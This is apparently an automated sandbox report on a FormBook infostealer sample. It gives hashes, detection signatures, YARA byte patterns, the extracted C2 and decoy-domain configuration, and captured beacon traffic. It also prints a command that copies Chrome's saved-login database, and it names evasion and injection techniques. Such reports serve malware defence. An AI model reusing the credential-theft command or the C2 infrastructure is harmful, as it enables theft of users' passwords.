Play interactive tour

Edit tour

Analysis Report focus.com

Overview

General Information

Sample Name:	focus.com (renamed file extension from com to exe)
Analysis ID:	412792
MD5:	5e5cc661beb832b718df6b68d16c0165
SHA1:	af146998a35d9a76b9969b85811d19b2a5cd21a9
SHA256:	bf07af9d0e95551d5599a2c1145adc2fb24595e8451c1340b91969f8577cd212
Tags:	com
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected FormBook malware

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

PE file has a writeable .text section

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

focus.exe (PID: 3176 cmdline: 'C:\Users\user\Desktop\focus.exe' MD5: 5E5CC661BEB832B718DF6B68D16C0165)

player-toolkit.exe (PID: 2588 cmdline: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe MD5: 1844A4E542EEAC121065EA23B0F1D6B3)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autochk.exe (PID: 2428 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)

wscript.exe (PID: 1956 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 404 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

player-toolkit.exe (PID: 5216 cmdline: 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe' MD5: 1844A4E542EEAC121065EA23B0F1D6B3)

player-toolkit.exe (PID: 5452 cmdline: 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe' MD5: 1844A4E542EEAC121065EA23B0F1D6B3)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hollandhousedesigns.design/vns/"], "decoy": ["sparkspressworld.com", "everydayresidency.com", "thebosscollectionn.com", "milkweedmagic.com", "worklesshours.com", "romeosfurnituremadera.com", "unclepetesproduce.com", "athleticamackay.com", "9nhl.com", "powellassetmanagement.com", "jxlamp.com", "onpointpetproducts.com", "buymysoft.com", "nazertrader.com", "goprj.com", "keeptalkservice.com", "aolei1688.com", "donstackl.com", "almasorchids.com", "pj5bwn.com", "featuredshop2020.com", "connectmheduaction.com", "kcastleint.com", "quintessentialmiss.com", "forenvid.com", "vetementsbd.com", "fabrizioamadori.net", "remaxplatinumva.com", "drivecart.net", "ordertds.com", "huayuanjiajiao.com", "islamiportal.com", "innergardenhealing.space", "wlwmwntor.com", "wiitendo.com", "ceschandigarh.com", "mitchellche.com", "levaporz.com", "eraophthalmica.com", "gnzywyht.com", "bobbinsbroider.com", "pollygen.com", "xn--kbrsotocheckup-5fcc.com", "theunprofessionalpodcast.com", "lendini.site", "digitalpardis.com", "meenaveen.com", "yihuafence.com", "mercadoaria.com", "domennyarendi44.net", "juandiegopalacio.com", "meltdownfitnesstulsa.com", "xn--laclnicadelvnculo-gvbi.com", "paripartners378.com", "valadecia.com", "womenring.com", "ocarlosresolve.com", "vedicherbsindia.com", "nonnearrapate.com", "viplending.net", "angelbeatsgamingclan.com", "rigmodisc.com", "page-id-78613.com", "yapadaihindi.com"]}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x10157:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x103c1:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1c09f:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1bb8b:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1c1a1:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1c319:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x10dd9:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1ae06:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x11ad2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x21d41:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x22de0:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1ee23:$sqlite3step: 68 34 1C 7B E1 0x1ef36:$sqlite3step: 68 34 1C 7B E1 0x1ee52:$sqlite3text: 68 38 2A 90 C5 0x1ef77:$sqlite3text: 68 38 2A 90 C5 0x1ee65:$sqlite3blob: 68 53 D8 7F 8C 0x1ef8d:$sqlite3blob: 68 53 D8 7F 8C

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x88e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x956a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x173f9:$sqlite3step: 68 34 1C 7B E1 0x1750c:$sqlite3step: 68 34 1C 7B E1 0x17428:$sqlite3text: 68 38 2A 90 C5 0x1754d:$sqlite3text: 68 38 2A 90 C5 0x1743b:$sqlite3blob: 68 53 D8 7F 8C 0x17563:$sqlite3blob: 68 53 D8 7F 8C
00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x10177:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x103e1:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x6864a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x688b4:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1c0bf:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x743d7:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1bbab:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x73ec3:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1c1c1:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x744d9:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1c339:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x74651:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x10df9:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x692cc:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1ae26:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7313e:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x11af2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x69fc5:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x21d61:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x7a079:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x22e00:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1ee43:$sqlite3step: 68 34 1C 7B E1 0x1ef56:$sqlite3step: 68 34 1C 7B E1 0x7715b:$sqlite3step: 68 34 1C 7B E1 0x7726e:$sqlite3step: 68 34 1C 7B E1 0x1ee72:$sqlite3text: 68 38 2A 90 C5 0x1ef97:$sqlite3text: 68 38 2A 90 C5 0x7718a:$sqlite3text: 68 38 2A 90 C5 0x772af:$sqlite3text: 68 38 2A 90 C5 0x1ee85:$sqlite3blob: 68 53 D8 7F 8C 0x1efad:$sqlite3blob: 68 53 D8 7F 8C 0x7719d:$sqlite3blob: 68 53 D8 7F 8C 0x772c5:$sqlite3blob: 68 53 D8 7F 8C
00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.player-toolkit.exe.10000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.player-toolkit.exe.10000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.player-toolkit.exe.10000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x175f9:$sqlite3step: 68 34 1C 7B E1 0x1770c:$sqlite3step: 68 34 1C 7B E1 0x17628:$sqlite3text: 68 38 2A 90 C5 0x1774d:$sqlite3text: 68 38 2A 90 C5 0x1763b:$sqlite3blob: 68 53 D8 7F 8C 0x17763:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.forenvid.com/vns/	Avira URL Cloud: Label: malware
Source: http://www.forenvid.com	Avira URL Cloud: Label: malware
Source: http://www.forenvid.com/vns/www.thebosscollectionn.com	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.hollandhousedesigns.design/vns/"], "decoy": ["sparkspressworld.com", "everydayresidency.com", "thebosscollectionn.com", "milkweedmagic.com", "worklesshours.com", "romeosfurnituremadera.com", "unclepetesproduce.com", "athleticamackay.com", "9nhl.com", "powellassetmanagement.com", "jxlamp.com", "onpointpetproducts.com", "buymysoft.com", "nazertrader.com", "goprj.com", "keeptalkservice.com", "aolei1688.com", "donstackl.com", "almasorchids.com", "pj5bwn.com", "featuredshop2020.com", "connectmheduaction.com", "kcastleint.com", "quintessentialmiss.com", "forenvid.com", "vetementsbd.com", "fabrizioamadori.net", "remaxplatinumva.com", "drivecart.net", "ordertds.com", "huayuanjiajiao.com", "islamiportal.com", "innergardenhealing.space", "wlwmwntor.com", "wiitendo.com", "ceschandigarh.com", "mitchellche.com", "levaporz.com", "eraophthalmica.com", "gnzywyht.com", "bobbinsbroider.com", "pollygen.com", "xn--kbrsotocheckup-5fcc.com", "theunprofessionalpodcast.com", "lendini.site", "digitalpardis.com", "meenaveen.com", "yihuafence.com", "mercadoaria.com", "domennyarendi44.net", "juandiegopalacio.com", "meltdownfitnesstulsa.com", "xn--laclnicadelvnculo-gvbi.com", "paripartners378.com", "valadecia.com", "womenring.com", "ocarlosresolve.com", "vedicherbsindia.com", "nonnearrapate.com", "viplending.net", "angelbeatsgamingclan.com", "rigmodisc.com", "page-id-78613.com", "yapadaihindi.com"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll	Metadefender: Detection: 20%	Perma Link
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Metadefender: Detection: 26%	Perma Link
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Show sources

Source: focus.exe	Virustotal: Detection: 68%	Perma Link
Source: focus.exe	Metadefender: Detection: 26%	Perma Link
Source: focus.exe	ReversingLabs: Detection: 89%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED
Source: Yara match	File source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Joe Sandbox ML: detected

Source: 2.2.player-toolkit.exe.10000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00014C60 BCryptOpenAlgorithmProvider,BCryptGenRandom,BCryptCloseAlgorithmProvider,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E584EA0 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,GetLastError,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E585B30 CryptAcquireContextW,GetLastError,CryptGetUserKey,CryptReleaseContext,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E586950 MultiByteToWideChar,MultiByteToWideChar,GetLastError,CryptAcquireContextW,CryptGetProvParam,GetLastError,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext,

Source: focus.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\focus.exe

File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\ReadMe.txt

Jump to behavior

Source: focus.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscript.pdbGCTL source: player-toolkit.exe, 00000002.00000003.357830256.0000000000B24000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.345964478.000000000E1C0000.00000002.00000001.sdmp
Source:	Binary string: C:\workdir\build\Release_TS\IDMBrBtn\icu4c-57_1-src\obj\win3.pdb source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, wscript.exe, 00000018.00000002.463956730.00000000049EC000.00000004.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr
Source:	Binary string: D:\winx64-packages\Release\Release\PotPlayer\obj\Vi.pdb source: player-toolkit.exe, 00000002.00000002.359142610.000000006E4D6000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.464579995.000000006E616000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp, libdisplay4-1.dll.0.dr
Source:	Binary string: wntdll.pdbUGP source: player-toolkit.exe, 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: player-toolkit.exe, wscript.exe
Source:	Binary string: wscript.pdb source: player-toolkit.exe, 00000002.00000003.357830256.0000000000B24000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.345964478.000000000E1C0000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_004027A1 FindFirstFileA,
Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E56CD40 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,FindFirstFileW,FindNextFileW,WideCharToMultiByte,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5490FC FindFirstFileExW,

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop esi

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.hollandhousedesigns.design/vns/

Source: global traffic

HTTP traffic detected: GET /vns/?BlP=7+ZKUnh4u9UMtKwB98gwx/ZO0djsvR0w/TFw058Z3BgI+IMtx40n++NUyS4P23cT16Wd&vFNL=UFNx8bfpixDd HTTP/1.1Host: www.ordertds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

ASN Name: RACKSPACEUS RACKSPACEUS

